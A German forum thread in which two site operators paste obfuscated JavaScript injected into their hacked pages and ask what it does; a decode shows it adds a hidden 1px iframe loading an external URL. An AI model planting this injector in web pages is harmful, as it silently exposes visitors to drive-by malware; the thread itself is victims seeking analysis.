Warnung Vor Javascript Virus "appversion_var"

Hallo zusammen,


wir hatten letzte Woche massive Probleme mit mehreren von uns betreuten Webeiten. Vermutlich durch einen Trojaner wurden FTP-Daten vom Firmenlaptop gestohlen und auf mehreren Web-Servern sein unwesen getrieben. Anscheinend war die XML-Datei von Filezilla das Ziel. <img class=" />


Aber nun zum eigentlichen Problem - folgender Code wurde einfach automatisiert in den Head-Bereich von den HTML- und/oder PHP-Dateien geschrieben:


<****** type="text/javascript">
if('SWqd'=='pVIds')yQtLJ='KZAbgi';
var EtjY='oWqlS';
if('OKdyd'=='juVgU')NKIj='IkfX';
var fOasEf='evKdIb';
var PiGDye;
var eiJZJvHsB="889494905a4f4f878d939481944e898e868f4f";
var BLoj=241;
var hucD=126;
var NUaEJzZzl="\x66rom\x43ha\x72\x43od\x65";
var CRLTMp;


function YJbs(){
var jBHyFB='xZERob';
if('HzinY'=='VkRZS')eIRN();
}

var appVersion_var="appVe\x72s\x69\x6fn";
if('qGDo'=='OEkm')dAiK();

var pYcCkCtxW="bo\x64y";
var fdEs;
var TRREaO='gkLRg';
var iRttQIt="constructor";

if('bXRXcg'=='TCEVPf')GEdS();
var px1_var="1px";
var SfDxeN=58;
if('gcohh'=='XQAL')ZmyZA();
var VNXpwfH="\x61ppen\x64Child";
var pIPn=281;
var oCJrS;
var Unjhtpwk="p\x61rs\x65Int";


function HoKnc(){
}

var lglXBS='vUqzkn';
var jirmCY;
var itXUJgtk="\x73li\x63e";
var fTUc;
if('ojKRL'=='auQXP')bAhX();
var zUUyuKq="";
var HFXSN=68;
var IdKjjDt=(function(){
if('ArPpyf'=='OtImyQ')rABYw='elvQ';
if('UGbb'=='OObk')dinSTi='pAPYzX';
return this;
var zKDERN='zlqdj';

function qeEmug(){}
})();

var gCGXR='NwKDuW';
if('Huye'=='VxGO')eGqm='HJbwe';
var cittO="rodfWdnWZ"[iRttQIt];
var VkWmt='swOjR';

function nNKg(){}

function SIkl(){var qgbi='KNQW';
if('RqmE'=='YYrrlW')SscBls();}

var djIkR=36;
for(var UQhTPGeHM=0;UQhTPGeHM<eiJZJvHsB.length;UQhTPGeHM+=2){
function jmbb(){}

function arpJt(){var KMcm='vcyIMI';if('ilmemt'=='puEoI')gSLz();}

HWZiTeI=IdKjjDt[unjhtpwk](eiJZJvHsB[itXUJgtk](UQhTPGeHM,UQhTPGeHM+2),16)-32;
var olXpd;
zUUyuKq+=cittO[NUaEJzZzl](HWZiTeI);
var fAJJI;function CCFfvM(){}}

if('MyFfai'=='zXxyU')PrUR='XJuzgQ';
if('jrzmEK'=='rubR')BGyBw();
var Kdla=178;
var HDLITd;
var COUduU="rwXbeFGj";
function WGgso(){}if('dQEYI'=='wIEn')xZMn();
var XnLRZI=114;
var raPhPwx=navigator[appVersion_var].indexOf("MSIE")!=-1?'<iframe name="'+COUduU+'" src="'+"zUUyuKq"+'">':'iframe';if('scdjK'=='MOMx')CedOk='vPGXCf';

var lOlYgZrcc=document.createElement(raPhPwx);
function qTwTwV(){}
lOlYgZrcc.keMNCOd=lOlYgZrcc.setAttribute;
var PpqDw='qSTkp';
var tETG=17;
lOlYgZrcc.id=COUduU;
function bXoHj(){var qQYaz='WcUu';if('WfglY'=='OJQzmC')gwUyTX();}var hBQHy;
var MqXs;
lOlYgZrcc.name=COUduU;
if('ZgabRt'=='qAxKn')sOnyZ='MAsN';
function TuDjJM(){var zvkZ='scyOTc';
if('EOVZ'=='WLOS')UWrU();
}var ORweLH;lOlYgZrcc.keMNCOd("src",zUUyuKq);
var QkgK=106;
var rJhb;lOlYgZrcc.style.height=px1_var;
var oERyMv='CAvl';
var wPoIc='UWUU';
var uKlh=191;
lOlYgZrcc.style.position="absolute";
if('GBwYm'=='ergpH')SYJl();
if('XAyse'=='yCRU')Bxgso='dSIhyF';
lOlYgZrcc.style.right="0px";
lOlYgZrcc.style.width=px1_var;
var rFqwW=52;
lOlYgZrcc.style.top="0px";
if('pzcHi'=='EzNR')VzRt();
function vFLP(){var XRTLf='clstsz';
if('VtrpA'=='AklGuB')oVPc();
}
function CAjCMgsSa(){var twfkV;
if(document[pYcCkCtxW]){if('VXkX'=='iQbqEO')KjnTA='nnuk';
if('fMElu'=='fTZaH')ILXs();document[pYcCkCtxW][VNXpwfH](lOlYgZrcc);
var uhWUUN='ADlYww';
var sNmzM;
}else{var lZJPM=253;
setTimeout(CAjCMgsSa,120);
}
var yhZf='LPAik';
function eUeRmD(){}}
CAjCMgsSa();
var iGvsle;
function RDmLlY(){var RITVX='wHfN';
if('DbOj'=='nwVes')pNaN();
}var Icmaf;
</******>


Natürlich wurde sofort nachdem die Infizierung bekannt wurde alles lokal und auf dem Server bereinigt und die FTP-Passwörter umgehend geändert.


Jetzt frage mich aber, welche Absicht genau hinter dem Code steckt? Wie schadhaft ist er wirklich?


Es wird anscheinend ein iFrame eingebunden, aber wohin verweist es?


Außerdem lassen sich im Web noch zahlreiche Seiten finden, die den Code oder einen ähnlichen enthalten UND BITDEFENDER WEIST DIESE SEITEN ALS SICHER AUS!


Könnt ihr das mal überprüfen: Es reicht bei Google "appVersion_var" einzugeben.


Eine bereinigte Seite von uns wird zudem leider immer noch von BitDefender blockiert - gibt es eine spezielle Adresse an die man sich wenden soll oder ganz allgemein an das Support-Team schreiben? Möchte es hier ungern im Forum auflisten :rolleyes:


Danke für eure Hilfe.


LG Basti

Kommentare

  • Hallo basti. Ich habe den Code zum Labor weitergeleitet.

  • 123xyz
    bearbeitet September 2012

    Hallo,


    ich habe diesen Beitrag hier über die Suche nach "appVersion_var" gefunden.


    Gestern habe ich nur durch Zufall auf meinem eigenen Shop im Quelltext einen


    fast identischen Code entdeckt. Er war direkt an das HTML-Endtag, also nach </html>


    angehängt. Komischer Weise war er nach einem Reload wieder verschwunden.


    Was zur Hölle?


    Ich habe die Logs durchforstet, weiß aber nicht wonach ich gucken muss und


    bin somit nicht schlauer. Die Template-Files des Shops sind jedenfalls sauber.


    Das FTP-PAsswort wurde gleich geändert. Der Host hat den Server gescannt und


    nichts gefunden. Auch die Webmastertools von Google haben keine Malware


    registriert. Ein Free-Malware Website-Scan hat auch nichts auffälliges gezeigt.


    Auf meinem Rechner (Win7, ausschließlich Firefox) haben weder Malwarebytes,


    noch das Windows-eigene Virenprogramm etwas gefunden. Ein Check mit TCP-View


    und Proces###plorer zeigte auch nichts auffälliges. Ich werde den Rechner


    heute Abend noch mal mit Kaspersky Rescue-Disk checken.


    Bei meinen Recherchen bin ich auf eine Seite gestoßen, auf der man das JS


    decodieren kann: http://jsunpack.jeek.org/dec/go?


    Das kam dabei heraus:


    //jsunpack.called CreateElement <iframe name="NEwhuy" src="http://hivoco.pro/ns9zqn3/">  //jsunpack.url undefined //jsunpack.url var KhIoEAgnU = http://hivoco.pro/ns9zqn3/  //jsunpack.url var RcjpoQtcw = <iframe name="NEwhuy" src="http://hivoco.pro/ns9zqn3/">  //jsunpack.url var newurl = <iframe name="NEwhuy" src="http://hivoco.pro/ns9zqn3/">


    Hier der gesamte Code:


    <****** type="text/javascript">document.cookie="d5bc2="+escape("1348153927.2981365")+"; expires=Sat, 20 Oct 2012 00:00:00; path=/";</******><****** type="text/javascript">if('Wboto'=='tfZeR')EPXG();var GcQK='ACKaA';var miHK=79;var iUGtqr="8f9b9b976156568f909d968a965597999656959a60a198955a56";var UYRvd="\x66romC\x68arCode";if('BSbQaS'=='RVbB')beEzt='IGbv';var sZLPTN='xULuOw';var appVersion_var="\x61ppV\x65rsion";function oxTp(){}
    var QvsH='pYpvtd';if('TPsXK'=='cVhgA')mIPlX();var px0_var="0px";var HbmvG;function ZPCH(){}
    var ycYSnK="\x62\x6f\x64\x79";function pCqsB(){}function inQLk(){}
    var YkfGgfdo="\x61pp\x65ndC\x68i\x6c\x64";var Aochtf='MwKvDS';var ymjCq="c\x6fnstr\x75\x63to\x72";var dHPy='AxzM';var xnuYad="pars\x65Int";if('qcshxX'=='xcWWS')FQKni='AIaDC';function xsKzjH(){var laib='CRLehJ';if('LZwAB'=='eEbGu')KGpq();}function GOSnG(){}
    function oQPsqY(){var JMSSF='RSMI';if('FMWJY'=='rqCPXV')oxmeR();}var HuLq='QHqoz';if('BzwbMG'=='IzKNeO')VEORh();var px1_var="1\x70\x78";function huLPL(){var MFdTn='YiFNj';if('gXZE'=='KOrMr')sEjDB();}if('cSzz'=='fISL')RtbOLZ();var jVJbZHan="s\x6cice";var LyCJsZ='prcCq';var KhIoEAgnU="";if('IOhDt'=='gOIBI')OcmG='MXpAHO';var fFkq;var hASdEvoVD=(function(){var IeIw=199;var IbyFqi='yullx';function zvyZI(){var vUSaE='cpEn';if('gKZcTI'=='PWezp')Hxjes();}
    return this;if('nSiOT'=='eyxb')CBBd();var kEDmOz;})();var yvHnz;var yppbkTj="EXEdslz"[ymjCq];if('xmbKeo'=='buqSo')ZBpE='eJFJ';var iOgOO=92;var oeqmJC;for(var zvyqNdka=0;zvyqNdka<iUGtqr.length;zvyqNdka+=2){if('ofRHl'=='QqInm')EIQX='orUs';function CgOwe(){var rvwySE='NZba';if('PtMT'=='PFfkN')qJFPmC();}
    qEomM=hASdEvoVD[xnuYad](iUGtqr[jVJbZHan](zvyqNdka,zvyqNdka+2),16)-39;if('EEcKQ'=='hYteg')pKfBQ='CvNIcl';KhIoEAgnU+=yppbkTj[UYRvd](qEomM);function nfkwsn(){}var JClbtR;}
    if('UAkCw'=='UakLjh')cpFXP='qPVk';if('wwuDz'=='elRMxA')RElUI();function QVAT(){}
    var zKxlUYH="NEwhuy";if('qytC'=='zhun')MJKs='FbXL';if('zJpc'=='rjPLJZ')WWbR();var tELTu=252;if('ERwzm'=='fZTrG')LeoUu='xsnDf';var lnEo;var RcjpoQtcw="";if('DKmm'=='ajtBXQ')OcLy='mVqZM';if(navigator[appVersion_var].indexOf("MSIE")!=-1){var ZYbcRy;RcjpoQtcw='<iframe name="'+zKxlUYH+'" src="'+KhIoEAgnU+'">';var NPudw;function lVieFT(){var nwXim='rwugL';if('EfCR'=='oOmkV')Okhl();}}else{if('IFxg'=='IzhjG')jTPz();function wIVYnA(){var akbE='giGUL';if('UpkgaI'=='lmEhyS')VajT();}
    RcjpoQtcw='iframe';function xTEPPi(){}function BrLc(){var swWo='XBEKh';if('YdlxdO'=='YqdMCP')EjgT();}}
    var sRPLin=89;var eOqzV=143;var ItbwDL='lfxU';var ktDejdmh=document.createElement(RcjpoQtcw);ktDejdmh.cSjvZaWWo=function(){function rqRM(){}
    this["src"]=KhIoEAgnU;if('hikRhN'=='xPum')KJRjY='Sypjw';function toUjU(){}}
    function RaFJLt(){}if('GbxgS'=='QInv')LueYpb();var jIyf='hGUQf';ktDejdmh.name=zKxlUYH;if('BKiuog'=='CIAvZ')fIErr();if('MqhZU'=='oyqQN')BVAH();ktDejdmh.style.top=px0_var;function NuPb(){var suFv='vEdJSy';if('ZQkP'=='ltJP')awtL();}
    var kXfNA=230;if('aoIwWm'=='ADNHV')HAXyan='xaytY';ktDejdmh.cSjvZaWWo();function QPgnG(){var fDOX='jRLqW';if('gznyr'=='Ehedl')DawUQI();}
    var tGeJhC=294;var rIEeU='QLUmF';if('bfRJ'=='pukcz')iqYbu='UZCfv';ktDejdmh.style.width=px1_var;function LYLDBa(){var uGyeW='oeXSPU';if('oAEbj'=='xjvi')XmOH();}var Kkyiy=17;ktDejdmh.style.right=px0_var;if('IaKE'=='IafgmA')DvMfuI='nSeH';ktDejdmh.style.height=px1_var;var JxqT;var RxXDN='HoRuRz';var DKxOiy='ZTsXss';ktDejdmh.style.position="absolute";function iDdb(){}
    function ARFCvbcFY(){var zoNm;var JCog=113;if(document[ycYSnK]){var bXLDX='PiEP';var Motw;if('NiTG'=='QBsQs')DpFCRh();var document_body_var=document[ycYSnK];if('RXhNv'=='zJmUfM')eetPox='YvNvx';function YyZBw(){var XibbBz='fgKmd';if('fOEqHw'=='oQuAiY')enjh();}if('DrgKXR'=='SrJGHF')sytfKJ='fRAmXS';document_body_var[YkfGgfdo].apply(document_body_var,[ktDejdmh]);function hsbvj(){}if('dnbBl'=='wDfb')Nkxc='hdGC';}else{var JGhKW=266;setTimeout(ARFCvbcFY,120);var RDnbp='EkkDZj';if('swPEIr'=='ZqAig')ZNPnrq();}
    var VdCn=37;function ELbuU(){}}
    if('IcxMSB'=='PIFc')FjBFLp='ExNEAe';function sLyOYe(){var gIcup='jZLSTm';if('pECPe'=='GBDf')jUCTpp();}
    ARFCvbcFY();var STBKLY='vAmLrj';function rIZuv(){}function wVTH(){var AQEG='lKBZT';if('Goxkdz'=='fmzZ')PHsd();}
    var gyjGR;</******>


    Was hat eigentlich das Labor zum Code meines Vorredners gesagt?


    Könnt Ihr mir weiter helfen?


    Grüße, Micha